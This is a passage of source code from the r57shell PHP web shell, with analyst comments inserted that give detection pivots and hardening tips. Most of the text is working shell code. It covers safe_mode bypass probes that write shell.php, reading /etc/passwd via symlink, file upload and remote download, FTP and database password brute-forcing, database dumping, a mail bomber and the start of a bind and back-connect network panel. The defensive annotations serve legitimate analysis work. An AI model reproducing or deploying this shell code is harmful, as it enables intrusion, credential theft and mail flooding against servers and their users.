7104echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7105
7106echo $te.'</div>'.$table_end1.$fe;
7107
7108}
7109
7110
7111
7112if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7113
7114{
7115
7116echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
7117
7118echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7119
7120echo $te.'</div>'.$table_end1.$fe;
7121
7122}
7123
7124
7125
7126if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7127
7128{
7129
7130echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
7131
7132echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7133
7134echo $te.'</div>'.$table_end1.$fe;
7135
7136}
7137
7138
7139
// Probe 'test13'. Printed only when $safe_mode or $open_basedir is set,
// error_log() exists and version_compare() reports PHP <= 5.2.2. It offers two
// text fields: `test13_file2`, defaulting to $dir."shell.php", and
// `test13_file1`, defaulting to "<? phpinfo(); ?>". What the handler does with
// them is not shown in this excerpt.
// Defender notes: the version gate means this section only appears on
// long-unsupported PHP, so keeping the runtime current removes it. Unexpected
// *.php files next to the shell are worth diffing against the deployed release.
7140if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
7141
7142{
7143
7144echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
7145
7146echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
7147
7148echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7149
7150echo $te.'</div>'.$table_end1.$fe;
7151
7152}
7153
7154
7155
7156if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7157
7158{
7159
7160echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
7161
7162echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
7163
7164echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7165
7166echo $te.'</div>'.$table_end1.$fe;
7167
7168}
7169
7170
7171
7172if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7173
7174{
7175
7176echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
7177
7178echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
7179
7180echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7181
7182echo $te.'</div>'.$table_end1.$fe;
7183
7184}
7185
7186
7187
7188if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
7189
7190{
7191
7192echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
7193
7194echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
7195
7196echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7197
7198echo $te.'</div>'.$table_end1.$fe;
7199
7200}
7201
7202
7203
7204if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7205
7206{
7207
7208echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
7209
7210echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7211
7212echo $te.'</div>'.$table_end1.$fe;
7213
7214}
7215
7216
7217
7218if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7219
7220{
7221
7222echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
7223
7224echo "<tr><td valign=top width=70%>".$ts;
7225
7226echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7227
7228echo $te."</td><td valign=top width=30%>".$ts;
7229
7230echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7231
7232echo $te."</td></tr>";
7233
7234echo $te.'</div>'.$table_end1;
7235
7236}
7237
7238
7239
7240if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7241
7242{
7243
7244echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
7245
7246echo "<tr><td valign=top width=70%>".$ts;
7247
7248echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7249
7250echo $te."</td><td valign=top width=30%>".$ts;
7251
7252echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7253
7254echo $te."</td></tr>";
7255
7256echo $te.'</div>'.$table_end1;
7257
7258}
7259
7260
7261
7262
7263
// Single-file upload section, printed when ini_get() is unavailable or the
// `file_uploads` setting is on. It opens its own multipart POST form named
// "upload" (instead of the shared $fs fragment) with a file field `userfile0`,
// a `nf1` checkbox, a `new_name` text field and a hidden `dir`.
// The code that stores the uploaded file is not visible in this excerpt.
// Mitigation: a web root the PHP user cannot write to, and no PHP execution in
// directories that accept uploads, removes most of the value of this section.
// Detection: multipart POSTs to a script that is not a known upload endpoint.
7264if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7265
7266echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7267
7268echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
7269
7270echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
7271
7272echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7273
7274echo $te.'</div>'.$table_end1.$fe;
7275
7276}
7277
7278
7279
7280
7281
7282if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7283
7284echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7285
7286echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
7287
7288echo "<tr><td valign=top width=50%>".$ts;
7289
7290echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
7291
7292echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
7293
7294echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
7295
7296echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
7297
7298echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
7299
7300echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
7301
7302echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
7303
7304echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
7305
7306echo $te."</td><td valign=top width=50%>".$ts;
7307
7308echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
7309
7310echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
7311
7312echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
7313
7314echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
7315
7316echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
7317
7318echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
7319
7320echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
7321
7322echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7323
7324echo $te."</td></tr>";
7325
7326echo $te.'</div>'.$table_end1.$fe;
7327
7328}
7329
7330
7331
7332
7333
// Remote-fetch section, printed only when $select_downloaders is non-empty.
// That variable is built outside this excerpt; presumably it is a <select> of
// download utilities found on the host — confirm against its definition.
// Fields: `rem_file` (default 'http://') and `loc_file` (default
// $dir.'/download.file'). The handler is not visible here.
// Detection: download utilities started as child processes of the web-server
// or PHP user, and outbound HTTP from a host that normally only serves it.
// Egress filtering on the web tier limits what this section can retrieve.
7334if($select_downloaders){
7335
7336 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
7337
7338 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
7339
7340 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7341
7342 echo $te.'</div>'.$table_end1.$fe;
7343
7344}
7345
7346
7347
// Analyst note: file-download panel. The form posts cmd=download_file with d_name
// (prefilled with $dir) and a 'compress' radio group.
// $arh accumulates the compression choices; each option is offered only when the matching
// PHP function (gzcompress / gzencode / bzcompress) exists on the host. The same $arh string
// is reused further down by the mail_file form.
// Hunting pivot: cmd=download_file combined with d_name in a request body.
7348echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
7349
7350echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
7351
7352$arh = $lang[$language.'_text92'];
7353
7354if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
7355
7356if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
7357
7358if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
7359
7360echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7361
7362echo $te.'</div>'.$table_end1.$fe;
7363
7364
7365
// Analyst note: FTP panel, rendered only when ftp_connect() exists (ftp extension loaded).
// Three separate forms are emitted side by side; the hidden cmd field tells them apart:
//   cmd=ftp_brute      -- brute_method (passwd|dic), reverse checkbox, ftp_login, dictionary
//   cmd=ftp_file_down  -- ftp_login, ftp_password, ftp_file, loc_file, ftp_mode
//   cmd=ftp_file_up    -- same fields as ftp_file_down
// All text fields are refilled from $_POST when present. Whether in() HTML-escapes those
// values is not visible in this chunk -- check its definition before treating the refill as safe.
// The request handlers for these cmd values live outside this chunk.
// Hunting pivots: the three cmd values above, and the parameter pair ftp_server_port + brute_method.
// Hardening: disabling the ftp extension where it is not needed removes this panel entirely.
7366if(@function_exists("ftp_connect")){
7367
7368echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7369
7370
7371
7372echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
7373
7374echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
7375
7376echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7377
7378echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7379
7380echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7381
7382echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
7383
7384echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7385
7386echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
7387
7388
7389
7390echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7391
7392echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
7393
7394echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7395
7396echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7397
7398echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7399
7400echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
7401
7402echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7403
7404echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7405
7406echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
7407
7408
7409
7410echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7411
7412echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
7413
7414echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7415
7416echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7417
7418echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7419
7420echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7421
7422echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
7423
7424echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7425
7426echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
7427
7428
7429
7430echo $te."</td>".$fe."</tr></div></table>";
7431
7432}
7433
7434
7435
7436
7437
// Analyst note: mail panel, rendered only when mail() exists.
// Three forms, told apart by the hidden cmd field:
//   cmd=mail         -- to, from, subj, text
//   cmd=mail_file    -- to, from, subj, loc_file, compress (reuses $arh built above)
//   cmd=mail_bomber  -- to, from, subj, text, mail_flood (default 100), mail_size (default 10)
// The two <textarea> elements concatenate $_POST['text'] straight into the HTML with no escaping
// visible on these lines (unless $_POST is sanitised earlier in the file -- not visible here).
// The handlers for these cmd values are outside this chunk.
// Hunting pivots: cmd=mail_bomber, and the parameter names mail_flood / mail_size.
// Operational signal on a compromised host: an unexpected burst in the local MTA queue or
// outbound SMTP volume originating from the web-server account.
// Hardening: list mail in disable_functions on hosts whose applications do not send mail.
7438if(@function_exists("mail")){
7439
7440echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7441
7442echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
7443
7444echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
7445
7446echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7447
7448echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7449
7450echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
7451
7452echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7453
7454
7455
7456echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7457
7458echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
7459
7460echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
7461
7462echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7463
7464echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
7465
7466echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
7467
7468echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7469
7470echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7471
7472
7473
7474echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7475
7476echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
7477
7478echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
7479
7480echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7481
7482echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7483
7484echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
7485
7486echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
7487
7488echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7489
7490
7491
7492echo $te."</td>".$fe."</tr></div></table>";
7493
7494}
7495
7496
7497
7498
7499
// Analyst note: database panel, rendered when at least one of the *_on driver flags is set
// (the flags are computed outside this chunk -- presumably by probing for each driver's functions).
// $select is a <select name=db> listing only the drivers flagged as available; it is reused
// in all three forms below.
// Forms, told apart by the hidden cmd field:
//   cmd=db_brute    -- db, db_server, db_port, mysql_db, brute_method, reverse, mysql_l, dictionary
//   cmd=mysql_dump  -- db, db_server, db_port, mysql_l, mysql_p, mysql_db, mysql_tbl, dif, dif_name
//   cmd=db_query    -- db, db_server, db_port, mysql_l, mysql_p, mysql_db, db_query (textarea)
// The db_query textarea concatenates $_POST['db_query'] straight into the HTML; no escaping is
// visible on that line. The handlers for these cmd values are outside this chunk.
// Hunting pivots: cmd=db_brute / mysql_dump / db_query, and the parameter names mysql_l, mysql_p, dif_name.
// Host-side signal: database logins from the web-server host using accounts the application
// does not own, or repeated authentication failures against localhost.
7500if($mysql_on||$mssql_on||$pg_on||$ora_on||$mysqli_on||$msql_on||$sqlite_on)
7501
7502{
7503
7504$select = '<select name=db>';
7505
7506if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
7507
7508if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
7509
7510if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>';
7511
7512if($ora_on) $select .= '<option value=Oracle>Oracle</option>';
7513
7514if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>';
7515
7516if($msql_on) $select .= '<option value=mSQL>mSQL</option>';
7517
7518if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>';
7519
7520$select .= '</select>';
7521
7522
7523
7524echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7525
7526echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
7527
7528
7529
7530echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
7531
7532echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7533
7534echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7535
7536echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7537
7538echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7539
7540echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7541
7542echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
7543
7544echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7545
7546echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
7547
7548
7549
7550echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7551
7552echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
7553
7554
7555
7556echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7557
7558echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7559
7560echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7561
7562echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
7563
7564echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
7565
7566echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
7567
7568
7569
7570echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7571
7572echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
7573
7574
7575
7576echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7577
7578echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7579
7580echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7581
7582echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7583
7584echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
7585
7586echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
7587
7588
7589
7590echo "</td>".$fe."</tr></div></table>";
7591
7592}
7593
7594
7595
7596
7597
// Analyst note: network panel, rendered only when $safe_mode is off and $unix is set
// (both computed outside this chunk).
// Four forms are emitted. None carries a hidden cmd field on these lines, so the handler
// presumably dispatches on the field names themselves -- confirm against the request-handling code:
//   port + bind_pass + use              (prefilled 11457 / 'r57')
//   ip + port + use                     (ip prefilled from REMOTE_ADDR, else 127.0.0.1)
//   local_port + remote_host + remote_port + use
//   proxy_port + use                    (prefilled 31337)
// The 'use' select offers Perl or C, so the helpers appear to need a Perl interpreter or a C
// compiler on the host (inferred from the option labels only).
// Hunting pivots: the parameter names bind_pass, remote_host, proxy_port in a request body;
// the prefilled port numbers are only form defaults and can be changed by the operator.
// Host-side signals: a new listening socket or outbound connection owned by the web-server
